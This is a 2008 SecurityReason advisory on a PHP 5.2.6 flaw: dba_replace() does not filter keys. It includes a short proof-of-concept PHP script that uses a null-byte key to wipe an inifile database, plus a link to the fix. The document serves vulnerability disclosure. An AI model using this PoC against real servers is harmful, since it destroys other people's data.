SecurityvulnsSECURITYVULNS:DOC:20931SecurityReason : PHP 5.2.6 dba_replace() destroying file
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
[ SecurityReason.com PHP 5.2.6 dba_replace() destroying file ]
Author: Maksymilian Arciemowicz
http://securityreason.com
Date:
-
- Written: 10.11.2008
-
- Public: 28.11.2008
SecurityReason Research
SecurityAlert Id: 58
SecurityRisk: Medium
Affected Software: PHP 5.2.6
Advisory URL: http://securityreason.com/achievement_securityalert/58
Vendor: http://www.php.net
- — 0.Description —
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl
with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web
developers to write dynamically generated pages quickly.
NOTE:
These functions build the foundation for accessing Berkeley DB style databases.
dba_replace - Replace or insert entry
- — 1. dba_replace() destroying file —
Function dba_replace() are not filtring strings key and value. There is a possibility the
destruction of the file.
cat /www/dba.hack.php
<?php
$source=dba_open("/www/about.ini", "wlt", "inifile");
dba_replace("HOME","/www/",$source);
?>
cat /www/about.ini
PATH=/
CURR=.
HOME=/home/
php /www/dba.hack.php
cat /www/about.ini
PATH=/
CURR=.
HOME=/www/
Well.
But, lets try use
cat /www/dba.ham.php
<?php
$source=dba_open("/www/about.ini", "wlt", "inifile");
dba_replace("\0","/www/",$source);
?>
php /www/dba.ham.php
cat /www/about.ini
Now /www/about.ini, is emtpy.
- — 2. How to fix —
Fixed in CVS
http://cvs.php.net/viewvc.cgi/php-src/NEWS?r1=1.2027.2.547.2.1313&r2=1.2027.2.547.2.1314&
-
— 3. Greets —
sp3x p_e_a Infospec schain -
— 4. Contact —
Author: SecurityReason [ Maksymilian Arciemowicz ]
Email: cxib [ a t] securityreason [d ot ] com
GPG: http://securityreason.pl/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com
http://securityreason.pl
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (OpenBSD)
iEYEARECAAYFAkkvKDcACgkQpiCeOKaYa9aRUgCgmsbU4uKeq1E+/yyIlQas9V14
e2MAoJobXQNRD8BNiDsHQYSNdOxIyQRc
=Tb8r
-----END PGP SIGNATURE-----